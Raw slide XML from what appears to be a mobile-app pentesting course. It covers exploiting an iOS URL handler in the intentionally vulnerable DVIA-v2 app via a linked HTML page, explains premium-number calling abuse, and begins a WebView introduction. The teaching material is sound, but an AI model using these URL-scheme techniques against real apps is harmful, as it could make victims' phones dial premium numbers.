                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>our</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>Jailbroken</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> phone, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>using</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> Safari open the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>following</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> URL:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://tmmmmmr.github.io/url_handler_dvia-v2.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>You can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>also</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>take</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the a look at the HTML code </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>above</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> and host </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>it</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>vour</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>own</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> server to test. Simply </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>review</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> the HTML to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>understand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> how </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>this</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>works</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:latin typeface="+mj-lt"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" i="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1" dirty="0">
              <a:latin typeface="+mj-lt"/>
            </a:endParaRP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48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000624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>HTML code :</a:t>
            </a:r>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endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Link</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> : </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://tmmmmmr.github.io/url_handler_dvia-v2.html</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" i="1" dirty="0"/>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A0079F1-0A29-4409-A608-5F9E58C24DF9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="418729" y="2116329"/>
            <a:ext cx="7639050" cy="1933575"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3096225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000624"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>ability</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> an app </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>ring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>arbitrary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> phone </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>numbers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>serious</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> issue in the mobile </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>environment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> due to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>possibility</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>making</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the app ring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>premium </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>numbers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>hence</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>attackers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> can </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>monetize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>vector</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> more </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>easilv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Real-world </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" i="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://software-security.sans.org/blog/2010/11/08/insecure-handling-url-schemes-apples-ios/</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600"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86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nSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>Result</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t> :</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1600" b="1" i="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="255588" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1600" i="1"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Finding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Exploiting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> URL handlers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22532" name="Picture 4" descr="Comment installer la bêta publique d&amp;#39;iOS et d&amp;#39;iPadOS 14 sur votre iPhone et  votre iPad | Auxiclic Bl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536" y="57240"/>
            <a:ext cx="136784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33081" t="20527" r="42968" b="10537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2166959" y="2313486"/>
            <a:ext cx="1970690" cy="3660278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4"/>
          <a:srcRect l="58607" t="20527" r="16998" b="10537"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5006353" y="2313486"/>
            <a:ext cx="2007186" cy="3660278"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22C0BAE-F349-4FCB-80EE-C98B35726FC0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2466975" y="3076575"/>
            <a:ext cx="868692" cy="123825"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="E0DFE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solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="66740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F145-143E-44E1-ABA4-68D8049EFC7D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>Summary</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Text Placeholder 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C9379511-431F-4F8A-AE5A-B6471494F3D8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="fr-FR"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="15" name="Rectangle 133123">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE1E5671-B01E-4B19-B868-8061487D2B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063" y="4568825"/>
            <a:ext cx="2428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6D16A9A1-F2B7-4756-8180-2FEB52453EF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="393330" y="2424615"/>
            <a:ext cx="5367337" cy="431800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx1">
              <a:lumMod val="50000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" sz="1400" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{83EEADC9-C584-41B7-9726-98F69C97D82F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="536574" y="1813635"/>
            <a:ext cx="4679950" cy="3814167"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:noFill/>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Pentest</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> VM/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tools</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Hacking mobile apps</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Automated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>security</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>testing</a:t>
            </a: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a:p>
            <a:pPr marL="400050" indent="-400050" defTabSz="915988">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="romanUcPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="fr-FR" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="50000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="113636130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18730" y="1447801"/>
            <a:ext cx="8503057" cy="5803899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>Introduction to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0" err="1"/>
              <a:t>WebViews</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="just">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>WebView</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> in Android </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0" err="1"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="1600" dirty="0"/>
              <a:t> a native Android </a:t>
            </a:r>
            <a:r>
